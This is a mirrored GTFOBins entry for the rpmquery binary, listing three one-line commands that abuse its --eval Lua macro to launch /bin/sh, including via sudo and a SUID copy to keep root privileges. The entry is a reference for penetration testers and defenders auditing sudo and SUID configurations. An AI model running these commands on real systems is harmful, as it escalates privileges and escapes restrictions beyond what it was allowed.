1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-07 08:06:05 +02:00
GTFOBins.github.io/_gtfobins/rpmquery.md
2018-05-21 20:14:41 +01:00

260 B

functions
exec-interactive sudo-enabled suid-enabled
code
rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
code
sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
code
./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'